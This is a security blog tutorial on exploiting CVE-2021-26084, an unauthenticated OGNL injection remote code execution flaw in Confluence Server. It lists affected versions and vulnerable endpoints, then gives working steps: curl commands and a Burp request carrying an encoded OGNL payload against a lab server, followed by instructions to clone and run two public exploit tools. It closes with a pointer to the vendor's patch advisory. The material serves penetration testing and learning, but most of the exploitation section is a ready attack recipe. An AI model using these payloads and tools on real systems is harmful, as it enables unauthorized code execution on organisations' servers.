VK9 Security

Confluence Server 7.12.4 – ‘OGNL injection’ Remote Code Execution (RCE) (Unauthenticated)

by | Sep 10, 2021 | Exploitation, Linux Exploitation, Windows Exploitation | 0 comments

Confluence is a collaboration wiki tool used to help teams to collaborate and share knowledge efficiently. With confluence, we can capture project requirements, assign tasks to specific users, and manage several calendars at once.

Atlassian Confluence Server and Center code could allow a remote attacker to execute arbitrary code on the system, caused by a webwork OGNL injection flaw. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

Affected Products

Confluence Server and Data Center versions before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5 are affected by this vulnerability.

Atlassian Confluence Server 6.9.0

Atlassian Confluence Server 6.12.0

Atlassian Confluence Server 6.7.0

Atlassian Confluence Server 6.13.0

Atlassian Confluence Server 6.14.0

Atlassian Confluence Server 6.15.0

Atlassian Confluence Server 6.11.0

Atlassian Confluence Server 7.1.0

Atlassian Confluence Data Center 6.11.0

Atlassian Confluence Data Center 6.12.0

Atlassian Confluence Data Center 6.13.0

Atlassian Confluence Data Center 6.14.0

Atlassian Confluence Data Center 6.15.0

Atlassian Confluence Data Center 7.1.0

Atlassian Confluence Server 7.9.0

Atlassian Confluence Server 7.10.0

Atlassian Confluence Server 4.0.0

Atlassian Confluence Server 5.0.0

Atlassian Confluence Server 6.0.0

Atlassian Confluence Server 6.1.0

Atlassian Confluence Server 6.2.0

Atlassian Confluence Server 6.3.0

Atlassian Confluence Server 6.4.0

Atlassian Confluence Server 6.5.0

Atlassian Confluence Server 6.6.0

Atlassian Confluence Server 6.8.0

Atlassian Confluence Server 7.0.0

Atlassian Confluence Server 7.2.0

Atlassian Confluence Server 7.3.0

Atlassian Confluence Server 7.4.0

Atlassian Confluence Server 7.5.0

Atlassian Confluence Server 7.6.0

Atlassian Confluence Server 7.7.0

Atlassian Confluence Server 7.8.0

Atlassian Confluence Server 7.11.0

Atlassian Confluence Server 7.12.0

Atlassian Confluence Data Center 4.0.0

Atlassian Confluence Data Center 5.0.0

Atlassian Confluence Data Center 6.0.0

Atlassian Confluence Data Center 6.1.0

Atlassian Confluence Data Center 6.2.0

Atlassian Confluence Data Center 6.3.0

Atlassian Confluence Data Center 6.4.0

Atlassian Confluence Data Center 6.5.0

Atlassian Confluence Data Center 6.6.0

Atlassian Confluence Data Center 6.7.0

Atlassian Confluence Data Center 6.8.0

Atlassian Confluence Data Center 6.9.0

Atlassian Confluence Data Center 6.10.0

Atlassian Confluence Data Center 7.0.0

Atlassian Confluence Data Center 7.2.0

Atlassian Confluence Data Center 7.3.0

Atlassian Confluence Data Center 7.4.0

Atlassian Confluence Data Center 7.5.0

Atlassian Confluence Data Center 7.6.0

Atlassian Confluence Data Center 7.7.0

Atlassian Confluence Data Center 7.8.0

Atlassian Confluence Data Center 7.9.0

Atlassian Confluence Data Center 7.10.0

Atlassian Confluence Data Center 7.11.0

Atlassian Confluence Data Center 7.12.0

Atlassian Confluence Data Center 7.12.4

Vulnerable paths

https://<REDACTED>/users/user-dark-features

https://<REDACTED>/login

https://<REDACTED>/pages/templates2/viewpagetemplate.action

https://<REDACTED>/template/custom/content-editor

https://<REDACTED>/templates/editor-preload-container

https://<REDACTED>/pages/createpage-entervariables.action

How to exploit

1. Verify connectivity to the Confluence server

CLI check

  • curl -i -s -k -X POST “http://192.168.0.6:8090/login.action”

Browser

2. Capture the request log in request using a web proxy, I’d be using BurpSuite.

3. Send it to repeater

4. Replace the URI and the os_username line with

  • /pages/createpage-entervariables.action
  • queryString=\u0027%2b#{5*10}%2b\u0027

Note: \u0027%2b#{5*10}%2b\u0027 is Unicode which is decoded to ‘+#{5*10}+’

5. Now send the crafted request. In the response you should search for querystring, and see the maths done correctly, result 5 * 10 = 50

6. Validating using curl

  • curl -i -s -k -X ‘POST’ –data-binary ‘queryString=\u0027%2b#{5*10}%2b\u0027’ ‘http://192.168.0.6:8090/pages/createpage-entervariables.action’ | grep -i querystring

At this point we have validated the vulnerability, now we need to get around and run some payload. In this case I will use 2 existing payloads

Exploitation (example 1)

1. For this first example I will use (https://github.com/taythebot/CVE-2021-26084) which is written in GO lang

  • git clone https://github.com/taythebot/CVE-2021-26084.git
  • cd CVE-2021-26084
  • ls

2. run the command

  • go run exploit.go -t http://192.168.0.6:8090 -i

Exploitation (example 2)

1. For this first example I will use (https://github.com/h3v0x/CVE-2021-26084_Confluence) which is written in Python

  • git clone https://github.com/h3v0x/CVE-2021-26084_Confluence.git
  • cd CVE-2021-26084_Confluence
  • ls

2. run the command

  • python3 Confluence_OGNLInjection.py -u http://192.168.0.6:8090

Remedy

Refer to Confluence Security Advisory – 2021-08-25 for patch, upgrade or suggested workaround information.

References

https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

https://packetstormsecurity.com/files/164013

https://www.exploit-db.com/exploits/50243

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084

https://jira.atlassian.com/browse/CONFSERVER-67940

https://github.com/h3v0x/CVE-2021-26084_Confluence/blob/main/Confluence_OGNLInjection.py

https://github.com/alt3kx/CVE-2021-26084_PoC

https://github.com/Udyz/CVE-2021-26084/blob/main/confluence-rce.py

 

468

Submit a Comment